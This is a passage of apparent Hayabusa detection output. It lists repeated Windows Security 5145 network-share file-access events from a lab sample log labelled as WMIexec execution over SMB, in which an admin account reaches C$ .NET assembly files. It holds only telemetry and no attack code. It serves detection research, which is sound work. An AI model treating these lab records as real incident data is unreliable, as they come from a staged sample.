Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\c90ef9a73ea0044641d31b19023aad61 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt\2c945f157cd851b9dc43e99e9a89b34d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr\0ed1ed0e250773e63d7fe047dde76c81 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napinit : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napinit\1264f8bd57934a4941865b3c0512803e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napsnap : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napsnap\5ab2511c5224a660e85286b3f2c2b752 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57#\cc32e4d4e4dfbff56d3ae35134c1f38e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\6a2929eeb7b5fa6ff9ef1b0f4ff440f1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67#\efd939ad16f7521ac6c0c15afdcb2fa2 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#\8bb4776b03f3c369fd0c81c51cf468ac : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\92388fbe99436e6ed1f56ee56f10c565 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#\9bb6d55c49486153c1c1872929def220 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c#\373b26e93f287f3cda45a6282a1de0d3 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b#\9551a2df153a961cbbcb79bca937a833 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877#\db7fe97a2a840dcc0278f7af89ea7fbe : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#\be1a119716bb1de8469b568ec9e31d9c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.378 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#\e1c86f334a29d92ca264950085cd817e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded#\8bda9cd4f7d015f685bae38300b2c281 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5#\276763baa173e2b94a6318e28594e7ee : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\619034abb9a9fb1b3dc32c0a9aa38d3c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.395 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI\e4b5f01da74352b18e1dffd68b611367 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework\8a1ed041bc25980a548a96cf4b78f4b6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413#\6f2318339b6bd916c3c62b95c91b305d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\352d34797f7cd44cd0973c33539200f1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost\a4c49e23c0c23b5db4c663738eac897e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn\d82382933ba69165a4398eba2fb6c0b2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.411 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System\c24d08cc4e93fc4f6f15a637b00a2721 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628#\1a6ec0d19dfcc35f62014ff3602e6a54 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e#\86d8003fea61ae88dd34584f08a9393c : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd#\a6af57d6c4eee4a8e0165604baa15b61 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 